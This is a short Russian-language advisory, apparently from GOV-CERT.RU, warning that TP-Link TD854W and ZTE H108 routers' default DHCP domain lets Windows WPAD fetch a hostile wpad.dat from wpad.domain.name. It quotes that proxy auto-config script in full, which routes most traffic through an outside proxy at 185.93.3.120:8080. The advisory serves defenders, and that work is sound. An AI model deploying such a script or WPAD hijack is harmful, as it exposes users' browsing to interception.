GOV-CERT.RU предупреждает об угрозах в CPE-оборудовании
08.12.2017
Теги: угрозы GOV-CERT.RU НКЦКИ

06.12.2017 Центром реагирования на компьютерные инциденты в информационно-телекоммуникационных сетях органов государственной власти Российской Федерации (GOV-CERT.RU) получена информация о некорректных предустановленных настройках ряда телекоммуникационного оборудования, используемого операторами связи и провайдерами.
В настройках роутеров TP-Link (модель TD854W) и ZTE (модель H108) по умолчанию установлен следующий параметр протокола DHCP (Dynamic Host Configuration Protocol): Default Domain = “domain.name”. По умолчанию в операционной системе Windows включена автоматическая настройка proxy-сервера с использованием протокола Web Proxy Auto-Discovery Protocol (WPAD). Файлом, содержащим параметры для настройки, является wpad.dat, для обращения к которому система отправляет HTTP-запрос на http://wpad.%domain%/wpad.dat, где вместо %domain% указывается домен рабочей станции. Так как в настройках роутера прописан домен “domain.name”, то происходит обращение к http://wpad.domain.name/wpad.dat. Содержание файла wpad.dat:
function FindProxyForURL(url, host) {
if (isPlainHostName(host) || dnsDomainIs(host, ".windowsupdate.com") || dnsDomainIs(host, ".microsoft.com") || dnsDomainIs(host, ".baidu.com") || dnsDomainIs(host, ".kaspersky.com") || dnsDomainIs(host, ".live.com") || isInNet(host, "10.0.0.0", "255.0.0.0") || isInNet(host, "172.16.0.0", "255.255.224.0") || isInNet(host, "192.168.0.0", "255.255.0.0") || isInNet(host, "127.0.0.0", "255.0.0.0")) return "DIRECT"; else return 'PROXY 185.93.3.120:8080'; |
Интернет-портал «Безопасность пользователей в сети Интернет»
admin@safe-surf.ru
https://safe-surf.ru
